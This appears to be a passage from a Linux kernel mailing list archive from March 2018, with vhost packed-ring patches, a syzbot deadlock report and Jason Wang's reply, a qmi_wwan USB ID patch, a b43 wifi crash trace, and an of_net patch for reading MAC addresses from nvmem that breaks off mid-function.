+	       (__u16)vhost_idx_diff(vq, new, old);
+}
+
+static bool vhost_notify_packed(struct vhost_dev *dev,
+				struct vhost_virtqueue *vq)
+{
+	__virtio16 event_off_wrap, event_flags;
+	__u16 old, new;
+	bool v, wrap;
+	int off;
+
+	/* Flush out used descriptors updates. This is paired
+	 * with the barrier that the Guest executes when enabling
+	 * interrupts.
+	 */
+	smp_mb();
+
+	if (vhost_get_avail(vq, event_flags,
+			   &vq->driver_event->desc_event_flags) < 0) {
+		vq_err(vq, "Failed to get driver desc_event_flags");
+		return true;
+	}
+
+	if (!(event_flags & cpu_to_vhost16(vq, RING_EVENT_FLAGS_DESC)))
+		return event_flags ==
+		       cpu_to_vhost16(vq, RING_EVENT_FLAGS_ENABLE);
+
+	/* Read desc event flags before event_off and event_wrap */
+	smp_rmb();
+
+	if (vhost_get_avail(vq, event_off_wrap,
+			    &vq->driver_event->desc_event_off_warp) < 0) {
+		vq_err(vq, "Failed to get driver desc_event_off/wrap");
+		return true;
+	}
+
+	off = vhost16_to_cpu(vq, event_off_wrap);
+
+	wrap = off & 0x1;
+	off >>= 1;
+
+	old = vq->signalled_used;
+	v = vq->signalled_used_valid;
+	new = vq->signalled_used = vq->last_used_idx;
+	vq->signalled_used_valid = true;
+
+	if (unlikely(!v))
+		return true;
+
+	return vhost_vring_packed_need_event(vq, new, old, off) &&
+	       wrap == vq->used_wrap_counter;
+}
+
+static bool vhost_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+{
+	if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
+		return vhost_notify_packed(dev, vq);
+	else
+		return vhost_notify_split(dev, vq);
+}
+
 /* This actually signals the guest, using eventfd. */
 void vhost_signal(struct vhost_dev *dev, struct vhost_virtqueue *vq)
 {
@@ -2789,7 +2911,17 @@ static bool vhost_enable_notify_packed(struct vhost_dev *dev,
 	__virtio16 flags;
 	int ret;
 
-	/* FIXME: disable notification through device area */
+	if (!(vq->used_flags & VRING_USED_F_NO_NOTIFY))
+		return false;
+	vq->used_flags &= ~VRING_USED_F_NO_NOTIFY;
+
+	flags = cpu_to_vhost16(vq, RING_EVENT_FLAGS_ENABLE);
+	ret = vhost_update_device_flags(vq, flags);
+	if (ret) {
+		vq_err(vq, "Failed to enable notification at %p: %d\n",
+		       &vq->device_event->desc_event_flags, ret);
+		return false;
+	}
 
 	/* They could have slipped one in as we were doing that: make
 	 * sure it's written, then check again. */
@@ -2855,7 +2987,18 @@ EXPORT_SYMBOL_GPL(vhost_enable_notify);
 static void vhost_disable_notify_packed(struct vhost_dev *dev,
 					struct vhost_virtqueue *vq)
 {
-	/* FIXME: disable notification through device area */
+	__virtio16 flags;
+	int r;
+
+	if (vq->used_flags & VRING_USED_F_NO_NOTIFY)
+		return;
+	vq->used_flags |= VRING_USED_F_NO_NOTIFY;
+
+	flags = cpu_to_vhost16(vq, RING_EVENT_FLAGS_DISABLE);
+	r = vhost_update_device_flags(vq, flags);
+	if (r)
+		vq_err(vq, "Failed to enable notification at %p: %d\n",
+		       &vq->device_event->desc_event_flags, r);
 }
 
 static void vhost_disable_notify_split(struct vhost_dev *dev,
diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
index 8a9df4f..02d7a36 100644
--- a/drivers/vhost/vhost.h
+++ b/drivers/vhost/vhost.h
@@ -96,8 +96,14 @@ struct vhost_virtqueue {
 		struct vring_desc __user *desc;
 		struct vring_desc_packed __user *desc_packed;
 	};
-	struct vring_avail __user *avail;
-	struct vring_used __user *used;
+	union {
+		struct vring_avail __user *avail;
+		struct vring_packed_desc_event __user *driver_event;
+	};
+	union {
+		struct vring_used __user *used;
+		struct vring_packed_desc_event __user *device_event;
+	};
 	const struct vhost_umem_node *meta_iotlb[VHOST_NUM_ADDRS];
 	struct file *kick;
 	struct eventfd_ctx *call_ctx;
diff --git a/include/uapi/linux/virtio_ring.h b/include/uapi/linux/virtio_ring.h
index e297580..7cdbf06 100644
--- a/include/uapi/linux/virtio_ring.h
+++ b/include/uapi/linux/virtio_ring.h
@@ -75,6 +75,25 @@ struct vring_desc_packed {
 	__virtio16 flags;
 };
 
+/* Enable events */
+#define RING_EVENT_FLAGS_ENABLE 0x0
+/* Disable events */
+#define RING_EVENT_FLAGS_DISABLE 0x1
+/*
+ * Enable events for a specific descriptor
+ * (as specified by Descriptor Ring Change Event Offset/Wrap Counter).
+ * Only valid if VIRTIO_F_RING_EVENT_IDX has been negotiated.
+ */
+#define RING_EVENT_FLAGS_DESC 0x2
+/* The value 0x3 is reserved */
+
+struct vring_packed_desc_event {
+	/* Descriptor Ring Change Event Offset and Wrap Counter */
+	__virtio16 desc_event_off_warp;
+	/* Descriptor Ring Change Event Flags */
+	__virtio16 desc_event_flags;
+};
+
 /* Virtio ring descriptors: 16 bytes.  These can chain together via "next". */
 struct vring_desc {
 	/* Address (guest-physical). */
-- 
2.7.4

^ permalink raw reply related

* [RFC PATCH V2 1/8] vhost: move get_rx_bufs to vhost.c
From: Jason Wang @ 2018-03-26  3:38 UTC (permalink / raw)
  To: mst, virtualization; +Cc: kvm, netdev, linux-kernel, Jason Wang
In-Reply-To: <1522035533-11786-1-git-send-email-jasowang@redhat.com>

Move get_rx_bufs() to vhost.c and rename it to
vhost_get_rx_bufs(). This helps to hide vring internal layout from
specific device implementation. Packed ring implementation will
benefit from this.

Signed-off-by: Jason Wang <jasowang@redhat.com>
---
 drivers/vhost/net.c   | 83 ++-------------------------------------------------
 drivers/vhost/vhost.c | 78 +++++++++++++++++++++++++++++++++++++++++++++++
 drivers/vhost/vhost.h |  7 +++++
 3 files changed, 88 insertions(+), 80 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index 8139bc7..57dfa63 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -658,83 +658,6 @@ static int vhost_net_rx_peek_head_len(struct vhost_net *net, struct sock *sk)
 	return len;
 }
 
-/* This is a multi-buffer version of vhost_get_desc, that works if
- *	vq has read descriptors only.
- * @vq		- the relevant virtqueue
- * @datalen	- data length we'll be reading
- * @iovcount	- returned count of io vectors we fill
- * @log		- vhost log
- * @log_num	- log offset
- * @quota       - headcount quota, 1 for big buffer
- *	returns number of buffer heads allocated, negative on error
- */
-static int get_rx_bufs(struct vhost_virtqueue *vq,
-		       struct vring_used_elem *heads,
-		       int datalen,
-		       unsigned *iovcount,
-		       struct vhost_log *log,
-		       unsigned *log_num,
-		       unsigned int quota)
-{
-	unsigned int out, in;
-	int seg = 0;
-	int headcount = 0;
-	unsigned d;
-	int r, nlogs = 0;
-	/* len is always initialized before use since we are always called with
-	 * datalen > 0.
-	 */
-	u32 uninitialized_var(len);
-
-	while (datalen > 0 && headcount < quota) {
-		if (unlikely(seg >= UIO_MAXIOV)) {
-			r = -ENOBUFS;
-			goto err;
-		}
-		r = vhost_get_vq_desc(vq, vq->iov + seg,
-				      ARRAY_SIZE(vq->iov) - seg, &out,
-				      &in, log, log_num);
-		if (unlikely(r < 0))
-			goto err;
-
-		d = r;
-		if (d == vq->num) {
-			r = 0;
-			goto err;
-		}
-		if (unlikely(out || in <= 0)) {
-			vq_err(vq, "unexpected descriptor format for RX: "
-				"out %d, in %d\n", out, in);
-			r = -EINVAL;
-			goto err;
-		}
-		if (unlikely(log)) {
-			nlogs += *log_num;
-			log += *log_num;
-		}
-		heads[headcount].id = cpu_to_vhost32(vq, d);
-		len = iov_length(vq->iov + seg, in);
-		heads[headcount].len = cpu_to_vhost32(vq, len);
-		datalen -= len;
-		++headcount;
-		seg += in;
-	}
-	heads[headcount - 1].len = cpu_to_vhost32(vq, len + datalen);
-	*iovcount = seg;
-	if (unlikely(log))
-		*log_num = nlogs;
-
-	/* Detect overrun */
-	if (unlikely(datalen > 0)) {
-		r = UIO_MAXIOV + 1;
-		goto err;
-	}
-	return headcount;
-err:
-	vhost_discard_vq_desc(vq, headcount);
-	return r;
-}
-
 /* Expects to be always run from workqueue - which acts as
  * read-size critical section for our kind of RCU. */
 static void handle_rx(struct vhost_net *net)
@@ -784,9 +707,9 @@ static void handle_rx(struct vhost_net *net)
 	while ((sock_len = vhost_net_rx_peek_head_len(net, sock->sk))) {
 		sock_len += sock_hlen;
 		vhost_len = sock_len + vhost_hlen;
-		headcount = get_rx_bufs(vq, vq->heads + nheads, vhost_len,
-					&in, vq_log, &log,
-					likely(mergeable) ? UIO_MAXIOV : 1);
+		headcount = vhost_get_bufs(vq, vq->heads + nheads, vhost_len,
+					   &in, vq_log, &log,
+					   likely(mergeable) ? UIO_MAXIOV : 1);
 		/* On error, stop handling until the next kick. */
 		if (unlikely(headcount < 0))
 			goto out;
diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
index 1b3e8d2d..c57df71 100644
--- a/drivers/vhost/vhost.c
+++ b/drivers/vhost/vhost.c
@@ -2098,6 +2098,84 @@ int vhost_get_vq_desc(struct vhost_virtqueue *vq,
 }
 EXPORT_SYMBOL_GPL(vhost_get_vq_desc);
 
+/* This is a multi-buffer version of vhost_get_desc, that works if
+ *	vq has read descriptors only.
+ * @vq		- the relevant virtqueue
+ * @datalen	- data length we'll be reading
+ * @iovcount	- returned count of io vectors we fill
+ * @log		- vhost log
+ * @log_num	- log offset
+ * @quota       - headcount quota, 1 for big buffer
+ *	returns number of buffer heads allocated, negative on error
+ */
+int vhost_get_bufs(struct vhost_virtqueue *vq,
+		   struct vring_used_elem *heads,
+		   int datalen,
+		   unsigned *iovcount,
+		   struct vhost_log *log,
+		   unsigned *log_num,
+		   unsigned int quota)
+{
+	unsigned int out, in;
+	int seg = 0;
+	int headcount = 0;
+	unsigned d;
+	int r, nlogs = 0;
+	/* len is always initialized before use since we are always called with
+	 * datalen > 0.
+	 */
+	u32 uninitialized_var(len);
+
+	while (datalen > 0 && headcount < quota) {
+		if (unlikely(seg >= UIO_MAXIOV)) {
+			r = -ENOBUFS;
+			goto err;
+		}
+		r = vhost_get_vq_desc(vq, vq->iov + seg,
+				      ARRAY_SIZE(vq->iov) - seg, &out,
+				      &in, log, log_num);
+		if (unlikely(r < 0))
+			goto err;
+
+		d = r;
+		if (d == vq->num) {
+			r = 0;
+			goto err;
+		}
+		if (unlikely(out || in <= 0)) {
+			vq_err(vq, "unexpected descriptor format for RX: "
+				"out %d, in %d\n", out, in);
+			r = -EINVAL;
+			goto err;
+		}
+		if (unlikely(log)) {
+			nlogs += *log_num;
+			log += *log_num;
+		}
+		heads[headcount].id = cpu_to_vhost32(vq, d);
+		len = iov_length(vq->iov + seg, in);
+		heads[headcount].len = cpu_to_vhost32(vq, len);
+		datalen -= len;
+		++headcount;
+		seg += in;
+	}
+	heads[headcount - 1].len = cpu_to_vhost32(vq, len + datalen);
+	*iovcount = seg;
+	if (unlikely(log))
+		*log_num = nlogs;
+
+	/* Detect overrun */
+	if (unlikely(datalen > 0)) {
+		r = UIO_MAXIOV + 1;
+		goto err;
+	}
+	return headcount;
+err:
+	vhost_discard_vq_desc(vq, headcount);
+	return r;
+}
+EXPORT_SYMBOL_GPL(vhost_get_bufs);
+
 /* Reverse the effect of vhost_get_vq_desc. Useful for error handling. */
 void vhost_discard_vq_desc(struct vhost_virtqueue *vq, int n)
 {
diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
index ac4b605..cbc2c80 100644
--- a/drivers/vhost/vhost.h
+++ b/drivers/vhost/vhost.h
@@ -185,6 +185,13 @@ int vhost_get_vq_desc(struct vhost_virtqueue *,
 		      struct iovec iov[], unsigned int iov_count,
 		      unsigned int *out_num, unsigned int *in_num,
 		      struct vhost_log *log, unsigned int *log_num);
+int vhost_get_bufs(struct vhost_virtqueue *vq,
+		   struct vring_used_elem *heads,
+		   int datalen,
+		   unsigned *iovcount,
+		   struct vhost_log *log,
+		   unsigned *log_num,
+		   unsigned int quota);
 void vhost_discard_vq_desc(struct vhost_virtqueue *, int n);
 
 int vhost_vq_init_access(struct vhost_virtqueue *);
-- 
2.7.4

^ permalink raw reply related

* Re: [RFC PATCH V2 0/8] Packed ring for vhost
From: Jason Wang @ 2018-03-26  3:44 UTC (permalink / raw)
  To: mst, virtualization
  Cc: kvm, netdev, linux-kernel, Tiwei Bie, Jens Freimann, Wei Xu
In-Reply-To: <1522035533-11786-1-git-send-email-jasowang@redhat.com>

cc Jens, Tiwei and Wei

Thanks


On 2018年03月26日 11:38, Jason Wang wrote:
> Hi all:
>
> This RFC implement packed ring layout. The code were tested with pmd
> implement by Jens at
> http://dpdk.org/ml/archives/dev/2018-January/089417.html. Minor change
> was needed for pmd codes to kick virtqueue since it assumes a busy
> polling backend.
>
> Test were done between localhost and guest. Testpmd (rxonly) in guest
> reports 2.4Mpps. Testpmd (txonly) repots about 2.1Mpps.
>
> Notes: The event suppression /indirect descriptor support is complied
>         test only because of lacked driver support.
>
> Changes from V1:
>
> - Refactor vhost used elem code to avoid open coding on used elem
> - Event suppression support (compile test only).
> - Indirect descriptor support (compile test only).
> - Zerocopy support.
> - vIOMMU support.
> - SCSI/VSOCK support (compile test only).
> - Fix several bugs
>
> For simplicity, I don't implement batching or other optimizations.
>
> Please review.
>
> Thanks
>
> Jason Wang (8):
>    vhost: move get_rx_bufs to vhost.c
>    vhost: hide used ring layout from device
>    vhost: do not use vring_used_elem
>    vhost_net: do not explicitly manipulate vhost_used_elem
>    vhost: vhost_put_user() can accept metadata type
>    virtio: introduce packed ring defines
>    vhost: packed ring support
>    vhost: event suppression for packed ring
>
>   drivers/vhost/net.c                | 138 ++-----
>   drivers/vhost/scsi.c               |  62 +--
>   drivers/vhost/vhost.c              | 818 ++++++++++++++++++++++++++++++++++---
>   drivers/vhost/vhost.h              |  46 ++-
>   drivers/vhost/vsock.c              |  42 +-
>   include/uapi/linux/virtio_config.h |   9 +
>   include/uapi/linux/virtio_ring.h   |  32 ++
>   7 files changed, 921 insertions(+), 226 deletions(-)
>

^ permalink raw reply

* Re: possible deadlock in handle_rx
From: Jason Wang @ 2018-03-26  3:48 UTC (permalink / raw)
  To: syzbot, kvm, linux-kernel, mst, netdev, syzkaller-bugs,
	virtualization
In-Reply-To: <001a113fe6d043b2a605684578f4@google.com>



On 2018年03月26日 08:01, syzbot wrote:
> Hello,
>
> syzbot hit the following crash on upstream commit
> cb6416592bc2a8b731dabcec0d63cda270764fc6 (Sun Mar 25 17:45:10 2018 +0000)
> Merge tag 'dmaengine-fix-4.16-rc7' of 
> git://git.kernel.org/pub/scm/linux/kernel/git/vkoul/slave-dma
> syzbot dashboard link: 
> https://syzkaller.appspot.com/bug?extid=7f073540b1384a614e09
>
> So far this crash happened 4 times on upstream.
> C reproducer: https://syzkaller.appspot.com/x/repro.c?id=6506789075943424
> syzkaller reproducer: 
> https://syzkaller.appspot.com/x/repro.syz?id=5716250550337536
> Raw console output: 
> https://syzkaller.appspot.com/x/log.txt?id=5142038655795200
> Kernel config: 
> https://syzkaller.appspot.com/x/.config?id=-5034017172441945317
> compiler: gcc (GCC) 7.1.1 20170620
>
> IMPORTANT: if you fix the bug, please add the following tag to the 
> commit:
> Reported-by: syzbot+7f073540b1384a614e09@syzkaller.appspotmail.com
> It will help syzbot understand when the bug is fixed. See footer for 
> details.
> If you forward the report, please keep this part and the footer.
>
>
> ============================================
> WARNING: possible recursive locking detected
> 4.16.0-rc6+ #366 Not tainted
> --------------------------------------------
> vhost-4248/4760 is trying to acquire lock:
>  (&vq->mutex){+.+.}, at: [<000000003482bddc>] 
> vhost_net_rx_peek_head_len drivers/vhost/net.c:633 [inline]
>  (&vq->mutex){+.+.}, at: [<000000003482bddc>] handle_rx+0xeb1/0x19c0 
> drivers/vhost/net.c:784
>
> but task is already holding lock:
>  (&vq->mutex){+.+.}, at: [<000000004de72f44>] handle_rx+0x1f5/0x19c0 
> drivers/vhost/net.c:766
>
> other info that might help us debug this:
>  Possible unsafe locking scenario:
>
>        CPU0
>        ----
>   lock(&vq->mutex);
>   lock(&vq->mutex);
>
>  *** DEADLOCK ***
>
>  May be due to missing lock nesting notation

Yes, it's a missing of nesting notation.

Will post a patch soon.

Thanks

^ permalink raw reply

* [PATCHv2] net/usb/qmi_wwan.c: Add USB id for lt4120 modem
From: Torsten Hilbrich @ 2018-03-26  5:19 UTC (permalink / raw)
  To: David Miller; +Cc: bjorn, netdev, linux-usb, Dennis.Wassenberg
In-Reply-To: <20180325.211654.1351947197260371018.davem@davemloft.net>

This is needed to support the modem found in HP EliteBook 820 G3.

Signed-off-by: Torsten Hilbrich <torsten.hilbrich@secunet.com>
---
 drivers/net/usb/qmi_wwan.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
index 76ac48095c29..e3ef0a0c715d 100644
--- a/drivers/net/usb/qmi_wwan.c
+++ b/drivers/net/usb/qmi_wwan.c
@@ -1240,6 +1240,7 @@ static const struct usb_device_id products[] = {
 	{QMI_FIXED_INTF(0x413c, 0x81b6, 8)},	/* Dell Wireless 5811e */
 	{QMI_FIXED_INTF(0x413c, 0x81b6, 10)},	/* Dell Wireless 5811e */
 	{QMI_FIXED_INTF(0x03f0, 0x4e1d, 8)},	/* HP lt4111 LTE/EV-DO/HSPA+ Gobi 4G Module */
+	{QMI_FIXED_INTF(0x03f0, 0x9d1d, 1)},	/* HP lt4120 Snapdragon X5 LTE */
 	{QMI_FIXED_INTF(0x22de, 0x9061, 3)},	/* WeTelecom WPD-600N */
 	{QMI_FIXED_INTF(0x1e0e, 0x9001, 5)},	/* SIMCom 7230E */
 	{QMI_QUIRK_SET_DTR(0x2c7c, 0x0125, 4)},	/* Quectel EC25, EC20 R2.0  Mini PCIe */
-- 
2.11.0

^ permalink raw reply related

* Re: [QUESTION] Mainline support for B43_PHY_AC wifi cards
From: Juri Lelli @ 2018-03-26  5:56 UTC (permalink / raw)
  To: Rafał Miłecki
  Cc: b43-dev, Network Development, linux-wireless@vger.kernel.org,
	Linux Kernel Mailing List
In-Reply-To: <CACna6rwk04dn2oVYsQMhmzvRTmuDv8_AKPK7+kBwbjB_CLRALg@mail.gmail.com>

On 24/03/18 00:01, Rafał Miłecki wrote:
> On 23 March 2018 at 15:09, Juri Lelli <juri.lelli@gmail.com> wrote:
> > On 23/03/18 14:43, Rafał Miłecki wrote:
> >> Hi,
> >>
> >> On 23 March 2018 at 10:47, Juri Lelli <juri.lelli@gmail.com> wrote:
> >> > I've got a Dell XPS 13 9343/0TM99H (BIOS A15 01/23/2018) mounting a
> >> > BCM4352 802.11ac (rev 03) wireless card and so far I've been using it on
> >> > Fedora with broadcom-wl package (which I believe installs Broadcom's STA
> >> > driver?). It works good apart from occasional hiccups after suspend.
> >> >
> >> > I'd like to get rid of that dependency (you can understand that it's
> >> > particularly annoying when testing mainline kernels), but I found out
> >> > that support for my card is BROKEN in mainline [1]. Just to see what
> >> > happens, I forcibly enabled it witnessing that it indeed crashes like
> >> > below as Kconfig warns. :)
> >> >
> >> >  bcma: bus0: Found chip with id 0x4352, rev 0x03 and package 0x00
> >> >  bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 0x2B, class 0x0)
> >> >  bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, rev 0x2A, class 0x0)
> >> >  bcma: bus0: Core 2 found: ARM CR4 (manuf 0x4BF, id 0x83E, rev 0x02, class 0x0)
> >> >  bcma: bus0: Core 3 found: PCIe Gen2 (manuf 0x4BF, id 0x83C, rev 0x01, class 0x0)
> >> >  bcma: bus0: Core 4 found: USB 2.0 Device (manuf 0x4BF, id 0x81A, rev 0x11, class 0x0)
> >> >  bcma: Unsupported SPROM revision: 11
> >> >  bcma: bus0: Invalid SPROM read from the PCIe card, trying to use fallback SPROM
> >> >  bcma: bus0: Using fallback SPROM failed (err -2)
> >> >  bcma: bus0: No SPROM available
> >> >  bcma: bus0: Bus registered
> >> >  b43-phy0: Broadcom 4352 WLAN found (core revision 42)
> >> >  b43-phy0: Found PHY: Analog 12, Type 11 (AC), Revision 1
> >> >  b43-phy0: Found Radio: Manuf 0x17F, ID 0x2069, Revision 4, Version 0
> >> >  BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
> >>
> >> This isn't really useful without a full backtrace.
> >
> > Sure. I cut it here because I didn't expect people to debug what is
> > already known to be broken (but still it seemed to carry useful
> > information about the hw). :)
> 
> Please paste the remaining part if you still got it.

Sure, please find it below.

Thanks!

- Juri

--->8---

[   60.732180] cfg80211: Loading compiled-in X.509 certificates for regulatory database
[   60.733048] cfg80211: Loaded X.509 cert 'sforshee: 00b28ddf47aef9cea7'
[   60.733303] platform regulatory.0: Direct firmware load for regulatory.db failed with error -2
[   60.733305] cfg80211: failed to load regulatory.db
[   61.047277] bcma: bus0: Found chip with id 0x4352, rev 0x03 and package 0x00
[   61.047302] bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 0x2B, class 0x0)
[   61.047316] bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, rev 0x2A, class 0x0)
[   61.047340] bcma: bus0: Core 2 found: ARM CR4 (manuf 0x4BF, id 0x83E, rev 0x02, class 0x0)
[   61.047366] bcma: bus0: Core 3 found: PCIe Gen2 (manuf 0x4BF, id 0x83C, rev 0x01, class 0x0)
[   61.047380] bcma: bus0: Core 4 found: USB 2.0 Device (manuf 0x4BF, id 0x81A, rev 0x11, class 0x0)
[   61.107321] bcma: Unsupported SPROM revision: 11
[   61.107325] bcma: bus0: Invalid SPROM read from the PCIe card, trying to use fallback SPROM
[   61.107326] bcma: bus0: Using fallback SPROM failed (err -2)
[   61.107327] bcma: bus0: No SPROM available
[   61.109830] bcma: bus0: Bus registered
[   61.242068] b43-phy0: Broadcom 4352 WLAN found (core revision 42)
[   61.242481] b43-phy0: Found PHY: Analog 12, Type 11 (AC), Revision 1
[   61.242487] b43-phy0: Found Radio: Manuf 0x17F, ID 0x2069, Revision 4, Version 0
[   61.242909] BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
[   61.242916] IP:           (null)
[   61.242919] PGD 0 P4D 0 
[   61.242924] Oops: 0010 [#1] PREEMPT SMP PTI
[   61.242926] Modules linked in: b43(+) bcma mac80211 cfg80211 ssb mmc_core rfcomm fuse nf_conntrack_netbios_ns nf_conntrack_broadcast xt_CT ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 xt_conntrack ip_set nfnetlink ebtable_nat ebtable_broute bridge stp llc ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_raw ip6table_security iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack libcrc32c iptable_mangle iptable_raw iptable_security ebtable_filter ebtables ip6table_filter ip6_tables cmac bnep sunrpc intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic snd_hda_intel btusb snd_hda_codec uvcvideo btrtl btbcm btintel snd_hda_core bluetooth snd_hwdep videobuf2_
 vmalloc snd_seq
[   61.242989]  videobuf2_memops videobuf2_v4l2 iTCO_wdt snd_seq_device snd_pcm videobuf2_common iTCO_vendor_support dell_laptop dell_wmi irqbypass videodev wmi_bmof sparse_keymap dell_smbios intel_cstate dell_wmi_descriptor intel_uncore dcdbas ecdh_generic snd_timer intel_rapl_perf snd rfkill mei_me media pcspkr mei i2c_i801 shpchp joydev tpm_crb soundcore intel_pch_thermal processor_thermal_device lpc_ich tpm_tis intel_soc_dts_iosf wmi tpm_tis_core tpm int3403_thermal dw_dmac int3402_thermal int3400_thermal int340x_thermal_zone acpi_pad acpi_thermal_rel dm_crypt i915 i2c_algo_bit drm_kms_helper drm hid_multitouch crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel serio_raw video i2c_hid
[   61.243044] CPU: 1 PID: 2410 Comm: modprobe Not tainted 4.16.0-rc6+ #2
[   61.243046] Hardware name: Dell Inc. XPS 13 9343/0TM99H, BIOS A15 01/23/2018
[   61.243049] RIP: 0010:          (null)
[   61.243051] RSP: 0018:ffffaaa6c2afbaf0 EFLAGS: 00010282
[   61.243054] RAX: 0000000000000000 RBX: ffff908d0b3c4800 RCX: ffff908d0b3c2800
[   61.243057] RDX: ffff908d0b3c2800 RSI: 0000000000000001 RDI: ffff908d0b3c4800
[   61.243059] RBP: 0000000000000001 R08: 0000000000000001 R09: 0000000000000000
[   61.243061] R10: 0000000000000000 R11: 000000000000008b R12: 0000000000000001
[   61.243064] R13: ffff908d082b9f00 R14: ffff908d0b3c4800 R15: 0000000000000004
[   61.243067] FS:  00007feb59ec30c0(0000) GS:ffff908d1f480000(0000) knlGS:0000000000000000
[   61.243069] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   61.243071] CR2: 0000000000000000 CR3: 000000020caaa002 CR4: 00000000003606e0
[   61.243074] Call Trace:
[   61.243089]  ? b43_wireless_core_reset+0x38/0x230 [b43]
[   61.243099]  ? b43_one_core_attach+0x368/0xd00 [b43]
[   61.243109]  ? b43_bcma_probe+0x54/0xf0 [b43]
[   61.243115]  ? bcma_device_probe+0x31/0x60 [bcma]
[   61.243120]  ? preempt_count_sub+0x9b/0xd0
[   61.243125]  ? driver_probe_device+0x30b/0x480
[   61.243129]  ? __driver_attach+0xb8/0xe0
[   61.243133]  ? driver_probe_device+0x480/0x480
[   61.243136]  ? driver_probe_device+0x480/0x480
[   61.243140]  ? bus_for_each_dev+0x76/0xc0
[   61.243144]  ? bus_add_driver+0x161/0x260
[   61.243147]  ? 0xffffffffc0ab5000
[   61.243151]  ? driver_register+0x57/0xc0
[   61.243154]  ? 0xffffffffc0ab5000
[   61.243163]  ? b43_init+0x24/0x1000 [b43]
[   61.243167]  ? do_one_initcall+0x4e/0x192
[   61.243172]  ? kmem_cache_alloc_trace+0xa1/0x1c0
[   61.243177]  ? do_init_module+0x5b/0x20b
[   61.243180]  ? load_module+0x257b/0x2bb0
[   61.243185]  ? vfs_read+0x113/0x130
[   61.243191]  ? SYSC_finit_module+0xe9/0x110
[   61.243194]  ? SYSC_finit_module+0xe9/0x110
[   61.243200]  ? do_syscall_64+0x79/0x190
[   61.243205]  ? entry_SYSCALL_64_after_hwframe+0x42/0xb7
[   61.243209] Code:  Bad RIP value.
[   61.243217] RIP:           (null) RSP: ffffaaa6c2afbaf0
[   61.243218] CR2: 0000000000000000
[   61.243222] ---[ end trace 3e3c52c383af1049 ]---

^ permalink raw reply

* [PATCH v2] of_net: Implement of_get_nvmem_mac_address helper
From: Mike Looijmans @ 2018-03-26  6:41 UTC (permalink / raw)
  To: netdev
  Cc: linux-kernel, devicetree, andrew, f.fainelli, robh+dt,
	frowand.list, Mike Looijmans
In-Reply-To: <1521815074-30424-1-git-send-email-mike.looijmans@topic.nl>

It's common practice to store MAC addresses for network interfaces into
nvmem devices. However the code to actually do this in the kernel lacks,
so this patch adds of_get_nvmem_mac_address() for drivers to obtain the
address from an nvmem cell provider.

This is particulary useful on devices where the ethernet interface cannot
be configured by the bootloader, for example because it's in an FPGA.

Tested by adapting the cadence macb driver to call this instead of
of_get_mac_address().

Signed-off-by: Mike Looijmans <mike.looijmans@topic.nl>
---
v2: Use of_nvmem_cell_get to avoid needing the assiciated device
    Use void* instead of char*
    Add devicetree binding doc
 Documentation/devicetree/bindings/net/ethernet.txt |  2 +
 drivers/of/of_net.c                                | 47 ++++++++++++++++++++++
 include/linux/of_net.h                             |  6 +++
 3 files changed, 55 insertions(+)

diff --git a/Documentation/devicetree/bindings/net/ethernet.txt b/Documentation/devicetree/bindings/net/ethernet.txt
index 2974e63..cfc376b 100644
--- a/Documentation/devicetree/bindings/net/ethernet.txt
+++ b/Documentation/devicetree/bindings/net/ethernet.txt
@@ -10,6 +10,8 @@ Documentation/devicetree/bindings/phy/phy-bindings.txt.
   the boot program; should be used in cases where the MAC address assigned to
   the device by the boot program is different from the "local-mac-address"
   property;
+- nvmem-cells: phandle, reference to an nvmem node for the MAC address;
+- nvmem-cell-names: string, should be "mac-address" if nvmem is to be used;
 - max-speed: number, specifies maximum speed in Mbit/s supported by the device;
 - max-frame-size: number, maximum transfer unit (IEEE defined MTU), rather than
   the maximum frame size (there's contradiction in the Devicetree
diff --git a/drivers/of/of_net.c b/drivers/of/of_net.c
index d820f3e..8999745 100644
--- a/drivers/of/of_net.c
+++ b/drivers/of/of_net.c
@@ -7,6 +7,7 @@
  */
 #include <linux/etherdevice.h>
 #include <linux/kernel.h>
+#include <linux/nvmem-consumer.h>
 #include <linux/of_net.h>
 #include <linux/phy.h>
 #include <linux/export.h>
@@ -80,3 +81,49 @@ const void *of_get_mac_address(struct device_node *np)
 	return of_get_mac_addr(np, "address");
 }
 EXPORT_SYMBOL(of_get_mac_address);
+
+/**
+ * Search the device tree for a MAC address, by calling of_get_mac_address
+ * and if that doesn't provide an address, fetch it from an nvmem provider
+ * using the name 'mac-address'.
+ * On success, copies the new address is into memory pointed to by addr and
+ * returns 0. Returns a negative error code otherwise.
+ * @dev:	Pointer to the device containing the device_node
+ * @addr:	Pointer to receive the MAC address using ether_addr_copy()
+ */
+int of_get_nvmem_mac_address(struct device_node *np, void *addr)
+{
+	const void *mac;
+	struct nvmem_cell *cell;
+	size_t len;
+	int ret;
+
+	mac = of_get_mac_address(np);
+	if (mac) {
+		ether_addr_copy(addr, mac);
+		return 0;
+	}
+
+	cell = of_nvmem_cell_get(np, "mac-address");
+	if (IS_ERR(cell))
+		return PTR_ERR(cell);
+
+	mac = nvmem_cell_read(cell, &len);
+
+	nvmem_cell_put(cell);
+
+	if (IS_ERR(mac))
+		return PTR_ERR(mac);
+
